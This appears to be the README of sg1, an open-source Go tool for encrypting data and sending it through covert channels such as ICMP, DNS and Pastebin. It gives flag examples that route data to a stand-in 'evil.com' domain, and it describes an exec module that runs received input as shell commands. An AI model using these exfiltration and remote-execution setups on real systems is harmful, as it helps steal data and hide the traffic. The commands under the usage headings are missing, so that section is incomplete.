sg1: swiss army knife for data encryption, exfiltration & covert communication

SG1 is a wanna be swiss army knife for data encryption, exfiltration, and covert communication. In its core sg1 aims to be as simple to use as nc while maintaining high modularity internally, being a framework for bizarre exfiltration, data manipulation and transfer methods.

Features

The main sg1 operation logic is:

while input.has_data() {

    data = input.read()

    foreach module in modules {

        data = module.process(data)

    }

    output.write(data)

}

Keep in mind that modules and channels can be piped one to another, just use sg1 -h to see a list of available channels and modules, try to pipe them and see what happens ^_^

Modules

Modules can be combined, for instance, if you want to read from input, decrypt from AES and execute, you would use:

-in:... -modules aes,exec -aes-mode decrypt -aes-key _somekeysomekey_ -out:...

raw

The default mode, will read from an input and write to output.

base64

Will read from input, encode in base64 and write to output.

aes

Will read from input, encrypt or decrypt (depending on –aes-mode parameter, which is encrypt by default) wih –aes-key and write to output.

Examples:

-modules aes --aes-key y0urp4ssw0rd
-modules aes -aes-modules decrypt --aes-key y0urp4ssw0rd

exec

Will read from input, execute as a shell command and pipe to output.

Channels

console

The default channel, stdin or stdout depending on the direction.

tcp

A tcp server (if used as input) or client (as output).

Examples:

-in tcp:0.0.0.0:10000
-out tcp:192.168.1.2:10000

udp

An udp packet listener (if used as input) or client (as output).

Examples:

-in udp:0.0.0.0:10000
-out udp:192.168.1.2:10000

tls

A tls tcp server (if used as input) or client (as output), it will automatically generate the key pair or load them via –tls-pem and –tls-key optional parameters.

Examples:

-in tls:0.0.0.0:10003

-out tls:192.168.1.2:10003

icmp

If used as output, data will be chunked and sent as ICMP echo packets, as input an ICMP listener will be started decoding those packets.

Examples:

-in icmp:0.0.0.0

-out icmp:192.168.1.2

dns

If used as output, data will be chunked and sent as DNS requests, as input a DNS server will be started decoding those requests. The accepted syntaxes are:

dns:domain.tld@resolver:port

In which case, DNS requests will be performed (or decoded) for subdomains of domain.tld, sent to the resolver ip address onport.

dns:domain.tld

DNS requests will be performed (or decoded) for subdomains of domain.tld using default system resolver.

dns

DNS requests will be performed (or decode) for subdomains of google.com using default system resolver.

Examples:

-in dns:evil.com@0.0.0.0:10053

-out dns:evil.com@192.168.1.2:10053

-out dns:evil.com

pastebin

If used as output, data will be chunked and sent to pastebin.com as private pastes, as input a Pastebin listener will be started decoding those pastes.

Examples:

-in pastebin:YOUR-API-KEY/YOUR-USER-KEY

-in pastebin:YOUR-API-KEY/YOUR-USER-KEY#some-stream-name

-out pastebin:YOUR-API-KEY/YOUR-USER-KEY

-out pastebin:YOUR-API-KEY/YOUR-USER-KEY#some-stream-name

This is how you can retrieve your user key given your api key.

Installation

go get github.com/miekg/dns

go get github.com/evilsocket/sg1



cd $GOPATH/src/github.com/evilsocket/sg1/

make

Usage

Simple file exfiltration over DNS:

Quick and dirty AES encrypted chat over TCP:

Encrypting data in AES and exfiltrate it via DNS requests:

Test with different operating systems ( tnx to decoded ): 

With bouncing to another host:

Just use sg1 -h to see a list of available channels and modules, try to pipe them and see what happens, you can also transfer files and make requests “bounce” to several machines with random AES keys ^_^

Copyright (C) 2017 evilsocket

Source: https://github.com/evilsocket